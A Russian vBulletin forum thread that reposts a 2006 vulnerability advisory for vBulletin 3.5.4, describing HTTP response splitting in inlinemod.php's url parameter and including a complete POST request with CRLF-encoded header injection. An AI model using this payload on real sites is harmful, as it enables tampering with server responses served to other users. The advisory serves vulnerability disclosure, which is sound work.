Студия креативных разработок DevArt.PRO.
Разработка сайтов и форумов под ключ!
Сильнейшая команда в России по vBulletin - читать подробнее...
 
 
 
 

 
 
Здесь скоро опять что то будет...
 
 
 
 
 
 
Loading

Вернуться   форум vBSupport.org > Разное (Другое) > Все — всем

Объявления
  • Изменения в правах
  • Каталог Фрилансеров
  • Добро пожаловать!
  • Premoderation
  • Новичкам!
  • For English speaking users
Закрытая тема
 
Опции темы Опции просмотра
Старый 06.05.2006, 19:58   #1
На доске почёта
Сходите на хуй, пожалуйста.
 
banned nax
дырка в 3.5.4

Код:
From: Агиевич Игорь aka Shanker <shanker_(at)_mail.ru>  
Date: 01.05.2006 
Subject: vBulletin v3.5.4: HTTP Response Splitting 

Здравствуйте, vuln. 

Уязвимость в параметре url скрипта inlinemod.php при POST-запросе: 
зарегистрированный пользователь может редактировать http-ответ. 

                    ПРИМЕР: 

POST /vb354/inlinemod.php HTTP/1.0 
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1 
Content-Length: 93 
Accept: */* 
Accept-Language: en-us 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
Host: www.vulnerable.com 
Content-Type: application/x-www-form-urlencoded 


do=clearthread&url=lala2%0d%0aContent-Length:
%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%
0a%0d%0a 

Уязвимость обнаружена в vBulletin v3.5.4 
Версия 3.0.9 не содержит скрипта inlinemod.php и поэтому не уязвима 


------------------------------------------------------------------ 
С уважением, 
Агиевич Игорь aka Shanker                mailto:shanker@mail.ru
 
Рекламка
Реклама на форуме
Старый 06.05.2006, 21:39   #2
zCarot
zМарковь
Хочет третью строчку =)
 
Аватар для zCarot
http://vbsupport.org/forum/showthread.php?t=5096
 
Закрытая тема

Закладки

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



 
 

Текущее время: 05:36 26.05.2012. Часовой пояс GMT +4.


Powered by vBulletin® Version 3.6.12
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd. Перевод: zCarot